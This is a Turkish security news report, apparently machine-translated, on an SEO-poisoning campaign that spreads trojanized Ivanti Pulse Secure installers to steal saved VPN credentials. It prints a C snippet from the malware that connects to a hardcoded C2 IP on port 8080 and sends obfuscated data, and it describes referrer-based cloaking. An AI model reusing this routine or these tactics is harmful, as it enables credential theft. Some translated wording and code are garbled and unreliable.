Agresif bir SEO zehirleme kampanyası Ekim 2025’in başlarında ortaya çıktı ve meşru Ivanti Pulse Secure VPN istemcisini arayan kullanıcıları hedef aldı.
Saldırganlar aşağıdaki gibi benzer alan adlarını kaydettirdiler: ivanti-pulsesecure.com Ve ivanti-secure-access.org resmi görünen truva atı haline getirilmiş yükleyicileri barındırmak için.
En iyi arama sonuçlarına tıklayan şüphelenmeyen kurbanlar, imzalı bir MSI dosyasının Ivanti’nin Güvenli Erişim İstemcisi kisvesi altında indirilmek üzere sunulduğu bu kötü amaçlı sitelere yönlendiriliyor.
Truva atı haline getirilmiş yükleyici, kayıtlı VPN bağlantı ayrıntılarını toplamak ve bunları Microsoft Azure altyapısında barındırılan bir C2 sunucusuna sızdırmak için tasarlanmış, kimlik bilgileri çalan bir DLL taşıyor.
.webp)
Zscaler araştırmacıları, kimlik avı alanları tarafından kullanılan karmaşık, yönlendiren tabanlı içerik dağıtım taktiğine dikkat çekti. Doğrudan bir tarayıcıdan erişildiğinde, siteler herhangi bir indirme bağlantısı olmadan iyi huylu içerik görüntüler ve analistler ve güvenlik tarayıcıları tarafından hızlı bir şekilde tespit edilmekten kaçınır.
Yalnızca arama motoru yönlendirmeleri yoluyla (özellikle Bing’den) gelen kullanıcılara, sayfaların gerçek amacını gizlemek için HTTP Yönlendiren başlığını kullanan kötü amaçlı indirme düğmesi gösteriliyor.
MSI yükleyicisi indirildikten sonra iki kötü amaçlı DLL dosyası bırakır:dwmapi.dll Ve pulseextension.dll—güvenlik kontrollerini daha da atlamak için meşru bir sertifika yetkilisi tarafından imzalanmıştır.
.webp)
Bu DLL’ler Ivanti bağlantı deposunu bulmak ve ayrıştırmak için bir dizi rutin içerir (connectionstore.dat), kayıtlı URI’lerin ve kimlik bilgilerinin çıkarılması.
Bulaşma mekanizmasının derinlemesine incelenmesi, kötü amaçlı yazılımın kalıcılığını ve gizliliğini nasıl sağladığını ortaya çıkarır. Yürütülmesinin ardından, truva atı haline getirilmiş DLL, 8080 numaralı bağlantı noktasında Azure aralığında (4.239.95.1) sabit kodlanmış bir IP adresiyle bir ağ anlaşması başlatır.
Aşağıdaki C kod parçacığı soket kurulumunu ve veri alışverişi rutinini göstermektedir: –
WSADATA was;
WSAStartup(MAKEWORD(2,2), &wsa);
int sock = socket(AF_INET, SOCK_STREAM, 0);
struct sockaddr_in addr = {0};
addr.sin_family = AF_INET;
addr.sin_port = htons(8080);
inet_pton(AF_INET, "4.239.95.1", &addr.sin_addr);
connect(sock, (struct sockaddr*)&addr, sizeof(addr));
// Receive 48 bytes
recv(sock, buf, 0x30, 0);
// XOR deobfuscation
for(int i=0;i<0x30;i++) buf[i]^=key[i];
// Send 52-byte obfuscated payload
send(sock, buf, 0x34, 0);.webp)
İlk el sıkışma ve XOR tabanlı kod çözme rutininden sonra, kötü amaçlı yazılım, çalınan VPN kimlik bilgilerini bir HTTP POST isteğinde yola iletir. /incomeshitsızıntı kanalları için günlük dilde kullanılan bir etiket.
IP, Microsoft Azure'un menzilinde bulunduğundan, güvenlik ekipleri bu bağlantıları zararsız bulut trafiği olarak gözden kaçırabilir.
Güvenilir yazılım kılığına giren ve gelişmiş kaçırma tekniklerini birleştiren bu kampanya, ilk erişim vektörü olarak arama motoru zehirlenmesinin gücünü ortaya koyuyor.
Kuruluşlar, tüm Ivanti yükleyici sağlama toplamlarını doğrulamalı, 8080 numaralı bağlantı noktasında tanıdık olmayan Azure IP'lerine giden bağlantıları izlemeli ve kullanıcıları resmi indirme kaynaklarını doğrulama konusunda eğitmelidir.
Yönlendiren tabanlı anormalliklere yönelik sürekli tehdit avcılığı, bu gizli saldırıları engellemek için hayati önem taşıyor.
Daha Fazla Anında Güncelleme Almak için Bizi Google Haberler, LinkedIn ve X'te Takip Edin, CSN'yi Google'da Tercih Edilen Kaynak olarak ayarlayın.
